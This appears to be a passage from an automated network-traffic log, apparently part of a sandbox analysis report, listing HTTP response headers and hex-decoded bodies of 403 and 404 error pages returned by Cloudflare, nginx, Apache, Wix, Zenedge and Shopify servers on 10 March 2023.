                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:36 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OGxOj%2FRe92PGHW%2FpL9LTvled3W%2FajLi9M2v9DFoa3muHGEAFsP28yCeXxUmdBr%2FbZA1yrsGmMucuUtM3yrHyqUCQUYlcN%2FNRzBSpg6yfU0rtVl0UnxGyqUjaZL0SNdgg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5b7885c5c92-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:36 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x6NBxEstGzmmFZF0pCD%2ByDhi%2BN0X4LDSHoGKPbqG83qk8ZJ0nDlNeWZEQ%2BmRLjqqI139gD8MJu03wQiwLjnM5Co7xJlGZu1Bl6sc9HxsrJKdTpMfyuG2y7DWgP2LaimH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5b7f8d95c92-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:37 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z3L5m3iGA76DU7NhKmzFtCQpOIhg%2B5OvuoeKWIcX%2FeaRNYLXmNpDAnjj%2BuZI%2FoJArJvIbeN4GRIE4Psebz3%2FKYTlDR6iO8s4FGdZaLYFuk9%2F1ocBOYSB5BF%2FW7mFfQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5bded549c0c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 Data Ascii: 1c08<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge">
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:38 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcfX4HJto+QUpjFQhXwjCys,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1678431278.95060622954115415X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:39 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:39 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:41 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=C4LmsQlCU8MRcKfseILQuhNWQewpObmDHGzvgNd%2B9mEluHgRz%2BrF5MGZncPcqtijN7oFqcIY%2FVHDxY2W2jsWik11VI3bCOXoIG8%2FCEqK6FJuI2s9UhViTv61qeQx4Iod2Pw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5d66ef3bbc2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:42 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Fri, 10 Mar 2023 06:54:47 GMTX-Cache-Status: X-Zen-Fury: 22a9a76a4b60576220fc96db5296ea02a26d8151Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 38 33 30 22 2c 20 31 36 37 38 34 33 31 32 37 30 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1830", 1678431270, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:54:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 6cf0f85d-3368-450e-be92-60bceecbd9f9CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z3fOuNP650Qt3Xwdd929R%2BOMbVUOVIfocxpo53C0FxZYs4clip7vSeIz2C7P%2FcwUclNu6VPytstEBKpfTMXn1s3C4TBDwMpRtJrVjoLjWCZywXDwjpBRkrbYQbEpTjk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=138.000011Server: cloudflareCF-RAY: 7a59a5f95e2f377c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:48 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtNL6DhP2FBFhTvEMJL8XJ%2FSbLRR%2Bu6jkSfVlwtmIBFTPG7tZMrhIki7VdzuokumbpqJgmjb5A5jQOl1rg1L8aVEIzzNOHYHQTwktqMG9PgrrPFcYvwqVBk2fLodAYxB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a5ff081a3677-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:48 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ot1RTpTPaRwVWAP5u%2B0vbjk1VBx3vb66CkK0Cfzm8D%2FMH%2FzVAg%2F1D74STQL7sn37zsXSYgMaeuk1zT30rs9Jlu6HnJQ4hg5G8RUNr754JqGsS15BwjQPXg6ZSqy0tQCE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a601db243677-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:54:50 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/F7ohSd5HIQqoFCM0zJgPyv,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1678431290.184126038662716358X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
